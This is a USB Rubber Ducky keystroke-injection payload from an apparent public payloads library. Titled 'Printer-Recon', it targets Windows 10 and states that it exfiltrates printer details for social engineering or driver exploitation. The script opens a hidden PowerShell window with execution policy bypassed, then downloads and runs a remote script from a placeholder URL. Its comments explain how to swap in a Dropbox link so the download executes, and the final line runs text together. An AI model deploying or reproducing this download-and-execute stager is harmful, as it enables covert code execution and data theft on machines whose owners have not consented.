usbrubberducky-payloads/payloads/library/exfiltration/Printer-Recon/payload.txt

21 lines
697 B
Plaintext

REM Title: Printer-Recon
REM Author: atomiczsec
REM Description: This payload is meant to exfiltrate printer information for further social engineering or driver explotation. Can also be used to find printer web interfaces on the network
REM Target: Windows 10
DEFINE TARGET_URL example.com
DELAY 2000
GUI r
DELAY 500
STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr TARGET_URL dl=1; iex $pl
ENTER
REM Remember to replace the link with your DropBox shared link for the intended file to download in the DEFINE constant
REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1